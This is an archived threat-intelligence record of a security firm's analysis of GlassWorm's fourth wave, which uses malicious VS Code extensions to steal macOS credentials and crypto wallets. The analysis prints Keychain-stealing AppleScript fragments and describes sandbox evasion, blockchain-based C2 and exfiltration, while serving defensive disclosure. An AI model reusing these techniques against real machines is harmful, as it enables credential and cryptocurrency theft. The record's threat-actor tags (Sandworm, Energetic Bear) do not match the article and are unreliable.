{
	"id": "453c1abf-e4e5-49cd-8bad-ed9bf953b81e",
	"created_at": "2026-04-29T02:20:42.994873Z",
	"updated_at": "2026-04-29T08:23:09.552098Z",
	"deleted_at": null,
	"sha1_hash": "893f608ab8679164102f51ff63a972bb856eae24",
	"title": "GlassWorm Goes Mac: Fresh Infrastructure, New Tricks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2554733,
	"plain_text": "GlassWorm Goes Mac: Fresh Infrastructure, New Tricks\r\nBy Gal Hachamov\r\nArchived: 2026-04-29 02:05:13 UTC\r\nTwo and a half months ago, we exposed GlassWorm, the first self-propagating worm targeting VS Code extensions, using invisible Unicode characters to hide malicious code. We've tracked this threat actor through three waves: invisible Unicode payloads, a return strike that exposed real victims including a Middle Eastern government entity, and a pivot to compiled Rust binaries.\r\nNow they're back: 50,000 downloads, a platform switch from Windows to macOS, and infrastructure that is fully operational as you read this.\r\nOur risk engine flagged three suspicious extensions on the Open VSX marketplace. At first, they didn't look connected to any campaign we'd been tracking. But then we noticed the Solana blockchain C2 – and when we traced the infrastructure, a familiar IP confirmed our suspicion: 45.32.151.157, the same C2 server from GlassWorm's third wave.\r\nKoidex report for Prettier Pro\r\nThe invisible Unicode technique we exposed in October? Gone. The Rust binaries from Wave 3? Also gone. This time, the payload is wrapped in AES-256-CBC encryption and embedded in compiled JavaScript - but the core mechanism remains the same: fetch the current C2 endpoint from Solana, execute what it returns. What's new is the target: code designed to replace hardware wallet applications with trojanized versions.\r\nThe GlassWorm actor isn't just persistent - they're evolving. And now they're coming for your Mac.\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 1 of 8\r\nPrettier Pro on open-vsx\r\nThe Pivot: From Windows to macOS\r\nThis is the biggest change in Wave 4. Every previous GlassWorm wave targeted Windows exclusively. Wave 4 targets macOS exclusively.\r\nWhy the shift?\r\nDevelopers use Macs. Especially in crypto, web3, and startup environments – exactly the victims GlassWorm wants to compromise. The attacker is fishing where the fish are.\r\nThis isn't a lazy port. The macOS payload is purpose-built, using platform-specific techniques throughout:\r\nAppleScript for stealth execution instead of PowerShell:\r\nset keychainPassword to do shell script \"security 2\u003e\u00261 \\\\\r\n find-generic-password -s 'pass_users_for_script' -w\"\r\nLaunchAgents for persistence instead of Registry keys and Scheduled Tasks:\r\nDirect Keychain database theft:\r\nreadwrite(profile \u0026 \"/Library/Keychains/login.keychain-db\", \\\\\r\n writemind \u0026 \"keychain\")\r\nThe attacker knows macOS. This is professional work.\r\nNew Delivery Method: Encrypted JavaScript\r\nWave 1 used invisible Unicode characters – literally unrenderable code hidden in whitespace.\r\nWave 3 used compiled Rust binaries – native code that requires reverse engineering to analyze.\r\nWave 4 uses something different: AES-256-CBC encrypted payloads embedded directly in compiled JavaScript.\r\nHere's what we found at line 64 of pro-svelte-extension's main file:\r\nThe payload is encrypted with a hardcoded key and IV. Same key across all three extensions – confirming a single actor. But here's the clever part:\r\nThe 15-minute delay.\r\nThat 9e5 in the code? That's 900,000 milliseconds. Fifteen minutes.\r\nMost automated sandbox environments time out after 5 minutes. By waiting 15 minutes before executing anything malicious, the malware evades dynamic analysis completely. The sandbox sees a clean extension. It gets approved. And 15 minutes after a developer installs it, the real payload drops.\r\nThis is why traditional security scanning missed it.\r\nNew C2 Infrastructure (Mostly)\r\nThe attacker is using a new Solana wallet for this wave: BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC – different from the wallets in previous waves, though the old ones remain active.\r\nWe can trace the infrastructure evolution through the blockchain. On November 27, a transaction pointed to 217.69.11.60. By December, the C2 had shifted to 45.32.151.157 - an IP that also appeared in Wave 3. That's how we know this is the same actor.\r\nThey also added a new exfiltration server: 45.32.150.251.\r\nThe Solana blockchain C2 technique remains unchanged – the attacker posts transaction memos containing base64-encoded URLs, and the malware queries the blockchain to find the current C2 endpoint. Immutable, decentralized, impossible to take down.\r\nNew Capability: Hardware Wallet Trojans\r\nHere's where Wave 4 gets truly dangerous.\r\nPrevious GlassWorm waves stole credentials and installed backdoors. Wave 4 does all that – plus it attempts to replace your hardware wallet applications with trojanized versions.\r\nImportant timing note: As of our testing on December 29, 2025, the C2 server endpoints for the trojanized wallets are returning empty files. The malware includes file size validation that prevents installation of files smaller than 1000 bytes – a defensive programming choice that causes the wallet replacement to silently fail when downloads are incomplete.\r\nThis could mean the attacker is still preparing the macOS wallet trojans, or the infrastructure is in transition. The capability is built and ready – it's just waiting for payloads to be uploaded. All other malicious functionality (credential theft, keychain access, data exfiltration, persistence) remains fully operational.\r\nThe code checks for both Ledger Live and Trezor Suite:\r\nIf either is found, the malware downloads a trojanized replacement, removes the legitimate app, and installs the malicious version in its place.\r\nThis is a significant escalation in capability. Hardware wallets are supposed to be the most secure way to store cryptocurrency. Users trust them precisely because the signing happens on a separate device. But if your Ledger Live or Trezor Suite application is compromised, the attacker can:\r\nDisplay fake receiving addresses\r\nModify transaction details before signing\r\nCapture your seed phrase during \"recovery\" flows\r\nIntercept communication between the app and device\r\nYour hardware wallet is only as secure as the software you use to interact with it.\r\nThe file size validation code reveals the attacker's attention to detail:\r\nThis isn't amateur hour. The attacker built in sanity checks to prevent broken installations that might alert victims. When the trojanized wallet payloads go live, the installation will be seamless.\r\nWhat Still Gets Stolen\r\nEven without the hardware wallet trojans active, the payload is devastating.\r\nCryptocurrency wallets – The malware targets 50+ browser extension wallets including MetaMask, Phantom, Coinbase Wallet, Exodus, Keplr, Solflare, Trust Wallet, and Rabby. It also goes after desktop wallets: Electrum, Coinomi, Exodus, Atomic, Ledger Live data, Trezor Suite data, Monero, and Bitcoin Core.\r\nDeveloper credentials – GitHub tokens from VS Code storage and git credential cache. NPM tokens from .npmrc. Your entire ~/.ssh directory. Git credentials from any cached authentication.\r\nSystem credentials – macOS Keychain passwords and the raw database file. VPN configurations. Browser cookies and local storage from Chrome, Firefox, Brave, and Edge.\r\nEverything gets staged in /tmp/ijewf/, compressed, and exfiltrated to 45.32.150.251/p2p.\r\nThe Evolution Pattern\r\nLet's step back and look at what we're seeing.\r\nWave 1 (October 17): Invisible Unicode in OpenVSX extensions. Windows-focused. Solana + Google Calendar for C2.\r\nWave 2 (November 6): Same technique, more extensions. We accessed the attacker's server and found real victims including a Middle Eastern government entity.\r\nWave 3 (November 22): Rust binaries instead of Unicode. No more invisible code – now it's compiled native code that requires reverse engineering.\r\nWave 4 (December 19): Platform pivot to macOS. Encrypted JavaScript payloads. New Solana wallet. Hardware wallet trojanization capability added.\r\nThe pattern is clear. Each time we expose their techniques, they adapt:\r\nUnicode technique documented → Switched to Rust binaries\r\nRust binaries analyzed → Moved to encrypted JavaScript\r\nWindows targeting known → Pivoted to macOS\r\nCredential theft established → Added hardware wallet trojans\r\nThis is an active, adaptive threat actor who reads security research and evolves their tooling in response. The shared infrastructure (45.32.151.157) proves it's the same actor. The constant evolution proves they're not going away.\r\nIOCs\r\nExtension IDs (open-vsx):\r\nstudio-velte-distributor.pro-svelte-extension\r\ncudra-production.vsce-prettier-pro\r\nPuccin-development.full-access-catppuccin-pro-extension\r\nNetwork Indicators:\r\n45.32.151.157 – Primary C2 (shared with Wave 3)\r\n45.32.150.251 – Exfiltration server\r\n217.69.11.60 – Earlier C2 (November 27, 2025)\r\nBjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC – Solana C2 wallet\r\nFinal Thoughts\r\nGlassWorm is now a cross-platform threat.\r\nThese extensions were live for days. In that window, they accumulated 50,000 downloads while the VS Code Marketplace's automated scanning saw nothing wrong.\r\nThat's not a failure of the scanning - it's a limitation of the approach. When malware waits 15 minutes to execute, static analysis will always come up clean. When C2 infrastructure lives on an immutable blockchain, there's no domain to blacklist. When the attacker reads your research and ships new techniques within weeks, signature-based detection is always one step behind.\r\nFour waves in two and a half months. Each one more capable than the last. The question isn't whether there will be a Wave 5 - it's whether you'll catch it before your developers install it.\r\nThis writeup was authored by the research team at Koi Security.\r\nOur risk engine, Wings, flagged these extensions within hours of publication. When attackers evolve this fast, you need continuous behavioral analysis across your entire software supply chain.\r\nBook a demo to see how Koi catches what satisfactory scanners miss.\r\nStay safe out there\r\nSource: https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks"
	],
	"report_names": [
		"glassworm-goes-mac-fresh-infrastructure-new-tricks"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-29T06:58:56.199012Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"Blue Echidna",
				"FROZENBARENTS",
				"UAC-0113",
				"UAC-0082",
				"Quedagh",
				"TEMP.Noble",
				"TeleBots",
				"IRIDIUM",
				"Seashell Blizzard",
				"APT44",
				"VOODOO BEAR",
				"IRON VIKING",
				"G0034",
				"ELECTRUM"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-29T06:58:57.873095Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-29T06:58:57.491949Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-29T06:58:57.716092Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1777429242,
	"ts_updated_at": 1777450989,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/893f608ab8679164102f51ff63a972bb856eae24.pdf",
		"text": "https://archive.orkl.eu/893f608ab8679164102f51ff63a972bb856eae24.txt",
		"img": "https://archive.orkl.eu/893f608ab8679164102f51ff63a972bb856eae24.jpg"
	}
}